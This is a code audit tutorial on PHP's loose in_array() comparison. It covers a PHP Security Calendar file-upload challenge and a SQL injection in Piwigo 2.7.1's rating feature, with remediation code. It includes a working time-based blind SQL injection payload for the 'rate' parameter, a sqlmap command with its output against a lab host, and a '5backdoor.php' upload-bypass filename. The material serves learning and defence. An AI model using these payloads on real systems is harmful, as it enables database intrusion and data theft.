Code Audit Learning 01: in_array() function defect

Source: Internet
Author: User

I. Starting the code audit journey, part 01

Starting today I am learning code audit, and this article is Code Audit 01. The topic is the first question of the PHP Security Calendar 2017, worked through together with the write-up from Red Sun Security.

II. A look at the challenge

1. Challenge name: Wish List

2. What in_array() does

in_array() checks whether its first argument (the needle) exists among the values of its second argument (the haystack array); it returns true if it is found and false otherwise. The important detail is the third argument: when it is true, the needle must also have the same type as the matching element (the comparison is made with ===) before the function returns true. When the third argument is omitted, the comparison is loose (==), PHP applies type juggling to make the two operands comparable, and that is exactly where the problem lies.

3. Vulnerability analysis

if (in_array($this->file['name'], $this->whitelist)) {
    move_uploaded_file($this->file['tmp_name'], self::UPLOAD_DIRECTORY . $this->file['name']);
}

The in_array() call only checks whether the file name is present in the whitelist, and the third argument is not set to true. The whitelist here is range(1, 24), so each check is a loose comparison between a string (the uploaded file name) and an integer. An attacker can upload a file named 5backdoor.php: in PHP 5 and PHP 7 the loose comparison converts the string to its leading numeric value, 5, which satisfies the whitelist condition, so 5backdoor.php is written into the upload directory under its original name. The result is an arbitrary file upload vulnerability. (PHP 8.0 changed int-to-string comparison so that a non-numeric string such as "5backdoor.php" no longer equals 5, which closes this particular trick, but a security check that relies on loose comparison is still wrong and should use strict comparison.)
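The check above beside a hardened version, as an added example that is not part of the challenge or of the original article. The whitelist range(1, 24) follows the challenge; the function names, the sample file names and the extension list in stored_name() are this example's own assumptions.

```php
<?php
// Added example (not the challenge's or the article's own code): the loose
// in_array() whitelist from the "Wish List" challenge beside a strict version,
// run over a few constructed file names. The whitelist range(1, 24) follows the
// challenge; the function names are this example's own.

function whitelist(): array
{
    return range(1, 24);
}

// As in the challenge: loose comparison. Each string name is compared with the
// integers 1..24 using ==, so PHP's type juggling decides the outcome.
function is_name_allowed_loose(string $name): bool
{
    return in_array($name, whitelist());
}

// Hardened: strict comparison (===). $_FILES names are strings while the
// whitelist holds integers, so the whitelist is converted to strings first;
// otherwise strict mode could never match anything. "5backdoor.php" !== "5".
function is_name_allowed_strict(string $name): bool
{
    $allowed = array_map('strval', whitelist());
    return in_array($name, $allowed, true);
}

// What a real upload handler should do in addition: never reuse the
// client-supplied name. Keep only a whitelisted extension (assumed list) and
// generate the stored name server-side.
function stored_name(string $clientName, array $allowedExt = ['jpg', 'png', 'gif']): ?string
{
    $ext = strtolower(pathinfo(basename($clientName), PATHINFO_EXTENSION));
    if (!in_array($ext, $allowedExt, true)) {
        return null;                      // rejects .php, .phtml, "" and so on
    }
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed inputs. Loose column under PHP 7 / PHP 8:
//   "5"             true  / true
//   "5backdoor.php" true  / false   (PHP 8 no longer treats it as equal to 5)
//   " 5"            true  / true    (leading whitespace is still numeric)
//   "25"            false / false
//   "0x5"           false / false
// The strict column is true only for "5".
$samples = ['5', '5backdoor.php', ' 5', '25', '0x5'];
printf("%-15s %-6s %-6s\n", 'name', 'loose', 'strict');
foreach ($samples as $name) {
    printf("%-15s %-6s %-6s\n",
        $name,
        var_export(is_name_allowed_loose($name), true),
        var_export(is_name_allowed_strict($name), true));
}

var_dump(stored_name('5backdoor.php'));   // NULL: extension not allowed
var_dump(stored_name('5.png') !== null);  // bool(true)
```

Run it with both a PHP 7 and a PHP 8 interpreter to see the loose column change while the strict column stays the same; the strict check is the one the application should rely on.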

4. in_array(): extending the knowledge

The following snippet makes the difference between loose and strict mode clear (the return values are given in the comments):

<?php
$array = array(
    'egg'     => true,
    'cheese'  => false,
    'hair'    => 765,
    'goblins' => null,
    'ogres'   => 'no ogres allowed in this array'
);

// Loose checking -- return values are in comments
// First three make sense, last four do not
var_dump(in_array(null, $array));    // true
var_dump(in_array(false, $array));   // true
var_dump(in_array(765, $array));     // true
var_dump(in_array(763, $array));     // true
var_dump(in_array('egg', $array));   // true
var_dump(in_array('hhh', $array));   // true
var_dump(in_array(array(), $array)); // true

// Strict checking
var_dump(in_array(null, $array, true));    // true
var_dump(in_array(false, $array, true));   // true
var_dump(in_array(765, $array, true));     // true
var_dump(in_array(763, $array, true));     // false
var_dump(in_array('egg', $array, true));   // false
var_dump(in_array('hhh', $array, true));   // false
var_dump(in_array(array(), $array, true)); // false
?>
III. A real-world case

We pick a SQL injection vulnerability in the Piwigo 2.7.1 content management system to analyze.

1. Analysis of the vulnerability

The files involved are include/functions_rate.inc.php, include/config_default.inc.php and picture.php in the root directory.

Key code in picture.php:

if (isset($_GET['action']))
{
  switch ($_GET['action'])
  {
/***************** omitted *********************/
    case 'rate' :
    {
      include_once(PHPWG_ROOT_PATH.'include/functions_rate.inc.php');
      rate_picture($page['image_id'], $_POST['rate']);
      redirect($url_self);
    }
/***************** omitted *********************/
  }
}

Key code in include/functions_rate.inc.php:

function rate_picture($image_id, $rate)
{
  global $conf, $user;

  if (!isset($rate)
      or !$conf['rate']
      or !in_array($rate, $conf['rate_items']))
  {
    return false;
  }
/***************** omitted *********************/
  if ($user_anonymous)
  {
    $query.= ' AND anonymous_id = \''.$anonymous_id.'\'';
  }
  pwg_query($query);

  $query = '
INSERT
  INTO '.RATE_TABLE.'
  (user_id,anonymous_id,element_id,rate,date)
  VALUES
  ('
    .$user['id'].','
    .'\''.$anonymous_id.'\','
    .$image_id.','
    .$rate
    .',NOW());';
  pwg_query($query);

  return update_rating_score($image_id);
}

Key code in include/config_default.inc.php:

$conf['rate_items'] = array(0,1,2,3,4,5);

From the code above: when action=rate, picture.php includes include/functions_rate.inc.php and calls rate_picture($image_id, $rate), where $rate is taken directly from $_POST['rate']. The only validation of $rate is in_array($rate, $conf['rate_items']) without the third argument, so the check is loose, and $rate is then concatenated into the INSERT statement without quoting or casting. Because the comparison is loose, any string that merely begins with one of the digits 0 to 5 passes the check on PHP 5 and PHP 7 (the target here runs PHP 5.4.45; PHP 8 would reject such a string, but the raw concatenation would still be wrong). Setting $rate to

1,1 and if(ascii(substr((select database()),1,1))=112,1,sleep(3)));#

turns the SQL statement into:

INSERT INTO piwigo_rate (user_id,anonymous_id,element_id,rate,date) VALUES (2,'192.168.2',1,1,1 and if(ascii(substr((select database()),1,1))=112,1,sleep(3)));#,NOW());

The injected expression becomes the date column, and the remainder of the original statement is commented out by #. The result is a time-based blind SQL injection: if the first character of the current database name is 'p' (ASCII 112) the statement returns immediately, otherwise it sleeps for three seconds.

2. Proof of the vulnerability

Use sqlmap to confirm the vulnerability; the command is:

python2 sqlmap.py -u "http://192.168.203.131/piwigo/picture.php?/1/category/1&action=rate" --data "rate=1" --dbs --batch

sqlmap returns:

[20:45:34] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://192.168.203.131:80/piwigo/picture.php?/1/category/1'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: rate (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: rate=1 AND SLEEP(5)
---
[20:45:37] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0.12
[20:45:37] [INFO] fetching database names
[20:45:37] [INFO] fetching number of databases
[20:45:37] [INFO] resumed: 5
[20:45:37] [INFO] resumed: information_schema
[20:45:37] [INFO] resumed: mysq
[20:45:37] [INFO] resumed: mysql
[20:45:37] [INFO] resumed: performance_schema
[20:45:37] [INFO] resumed: piwigo271
available databases [5]:
[*] information_schema
[*] mysq
[*] mysql
[*] performance_schema
[*] piwigo271

The probe sqlmap settled on, rate=1 AND SLEEP(5), passes the whitelist for the same reason as the hand-written payload: loosely compared, "1 AND SLEEP(5)" equals 1.
3. Repair suggestions

Method 1: pass true as the third argument of in_array(). Note that $_POST values are strings while $conf['rate_items'] holds integers, so the whitelist must be compared as strings (or the input cast to int first); otherwise every legitimate rating is rejected.

Method 2: convert the variable to an integer with intval() and use the converted value from then on, including in the query; an integer cannot carry SQL.

Method 3: filter with a regular expression that admits only digits (this is the approach taken in the official fix).

Whichever input check is chosen, the query itself should bind the value through a prepared statement (or at the very least quote and escape it), so that input validation is not the only thing standing between $_POST['rate'] and the database.
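The loose check from rate_picture() beside the three repair options, run against a benign rating and the injected inputs from the analysis above, as an added example that is not Piwigo's own code. The function names, the constructed inputs and the prepared-statement variant are this example's assumptions; the prepared statement is an addition beyond the three methods listed in the article.

```php
<?php
// Added example, not Piwigo's own code: the loose check from rate_picture()
// beside the three repair options from the article, run against constructed
// inputs, plus the INSERT built by concatenation (as in Piwigo 2.7.1) and as a
// prepared statement (this example's addition). Names and PDO usage are assumed.

function rate_items(): array
{
    return [0, 1, 2, 3, 4, 5];   // $conf['rate_items'] from config_default.inc.php
}

// Original check: loose ==. Under PHP 5/7, "1 and sleep(5)" == 1 is true
// because only the string's leading digit is used; PHP 8 compares it as a
// string and rejects it.
function check_loose($rate): bool
{
    return in_array($rate, rate_items());
}

// Method 1: strict ===. $_POST values are strings, so compare against the
// whitelist as strings or nothing legitimate would ever match.
function check_strict($rate): bool
{
    return in_array($rate, array_map('strval', rate_items()), true);
}

// Method 2: intval() first, and use the integer from then on. The injected
// tail is simply dropped; what reaches the query is an int.
function check_intval($rate): ?int
{
    if (!is_string($rate) && !is_int($rate)) {
        return null;
    }
    $n = intval($rate);
    return in_array($n, rate_items(), true) ? $n : null;
}

// Method 3 (the approach the article attributes to the official fix): digits
// only, then whitelist the integer.
function check_regex($rate): bool
{
    return is_string($rate)
        && preg_match('/^[0-9]+$/', $rate) === 1
        && in_array((int)$rate, rate_items(), true);
}

// The statement as rate_picture() assembles it: $rate is spliced in raw.
function build_insert_unsafe(int $userId, string $anonId, int $imageId, $rate): string
{
    return 'INSERT INTO piwigo_rate (user_id,anonymous_id,element_id,rate,date) VALUES ('
        . $userId . ',\'' . $anonId . '\',' . $imageId . ',' . $rate . ',NOW());';
}

// Same insert with a prepared statement: the rating is bound as data and is
// never parsed as SQL, whichever validation runs before it.
function insert_rate_safe(PDO $db, int $userId, string $anonId, int $imageId, int $rate): void
{
    $stmt = $db->prepare(
        'INSERT INTO piwigo_rate (user_id,anonymous_id,element_id,rate,date) VALUES (?,?,?,?,NOW())'
    );
    $stmt->execute([$userId, $anonId, $imageId, $rate]);
}

// Constructed inputs: a normal rating, sqlmap's probe, the article's payload,
// and an out-of-range value.
$inputs = [
    '3',
    '1 and sleep(5)',
    '1,1 and if(ascii(substr((select database()),1,1))=112,1,sleep(3)));#',
    '7',
];
printf("%-70s %-6s %-6s %-6s %-6s\n", 'rate', 'loose', 'strict', 'intval', 'regex');
foreach ($inputs as $rate) {
    printf("%-70s %-6s %-6s %-6s %-6s\n",
        $rate,
        var_export(check_loose($rate), true),   // PHP 7: true,true,true,false  PHP 8: true,false,false,false
        var_export(check_strict($rate), true),  // true,false,false,false
        var_export(check_intval($rate), true),  // 3,1,1,NULL
        var_export(check_regex($rate), true));  // true,false,false,false
}

// Raw concatenation with the payload reproduces the injected statement.
echo build_insert_unsafe(2, '192.168.2', 1, $inputs[2]), "\n";
```

Only the loose column depends on the interpreter version; the three repairs reject both injected strings on every PHP version, and with insert_rate_safe() the rating could not alter the statement even if a check were bypassed.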

IV. Learning similar CTF challenges

V. Personal takeaways

VI. References
